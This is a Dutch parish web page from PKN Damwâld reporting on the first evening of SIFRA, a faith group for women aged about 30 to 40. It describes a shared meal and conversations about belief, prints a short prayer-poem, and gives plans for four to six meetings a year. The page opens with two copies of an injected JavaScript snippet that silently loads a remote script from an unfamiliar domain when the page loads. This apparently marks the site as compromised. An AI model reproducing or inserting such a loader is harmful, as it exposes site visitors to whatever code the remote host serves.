;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); SIFRA ... Vrouw van 30-40 jaar ! ... terugblik op onze eerste bijeenkomst! - PKN Damwâld

SIFRA … Vrouw van 30-40 jaar ! … terugblik op onze eerste bijeenkomst!

Gepubliceerd op: donderdag 23 januari 2020

Terugkijkend op een heel gezellig samenzijn, hierbij een kort verslag van de eerste bijeenkomst van SIFRA. Rond 18:00 kwamen de eerste dames binnen. Ze werden welkom geheten met koffie en thee. Daarna stond er een héérlijk Italiaanse maaltijd voor ons klaar, gemaakt door een vrijwilliger. Tijdens het eten kwamen de gesprekken goed op gang. Na het eten is de groep in tweeën gesplitst, d.m.v. een klets-pot met vragen over het geloof, zijn wij de discussie en het gesprek aangegaan. Hier ontstonden mooie gesprekken over geloof, de kerk, geloof thuis en op het werk en het toepassen van geloof in je dagelijkse leven (met de mooie, maar ook moeilijke momenten). Vervolgens hebben we de avond afgesloten met de vraag hoe nu verder. Hoe vaak komen wij als groep samen? Waar is behoefte aan? Duidelijk werd dat er behoefte is aan samenzijn d.m.v. leuke activiteiten waarbij er verdieping gezocht wordt in het geloof. Dit is uiteindelijk het belangrijkste wat ons bindt, hét geloof.  Als afsluiting van de avond dit gedicht:

God,

opeens kan het ons te binnen schieten, het antwoord waarnaar we zochten,

de oplossing voor onze problemen, de uitweg uit de moeilijkheden.

Zomaar onverwacht komt het uit de lucht vallen

Komt het misschien van u?

 

Hebt U de antwoorden op al die vragen die we hebben?

Weet u waar we heen moeten? Waar onze toekomst ligt?

Waar het naartoe gaat met de wereld? En met wie we ons leven zullen delen?

 

Soms vinden we een antwoord

Trekt de mist even op.

Ontmoeten we een mens die ons verder helpt

Lezen we iets waarmee we verder kunnen

Is dat een cadeautje van u?

De bijeenkomsten zullen zo’n 4 tot 6 keer per jaar worden gehouden. Eveneens is er een whats- app groep aangemaakt waarin ideeen, leuke blogs, leuke christelijke concerten e.d. kunnen worden uitgewisseld. Ben je benieuwd, ben je tussen de +/- 30 en 40 jaar, ben je Gereformeerd of Hervormd, kom dan volgende keer ook! De nieuwe datum voor de volgende bijeenkomst wordt zo spoedig mogelijk bekend gemaakt.

Groet Sjoukje, Tjitske, Jellie, Afien en Robert.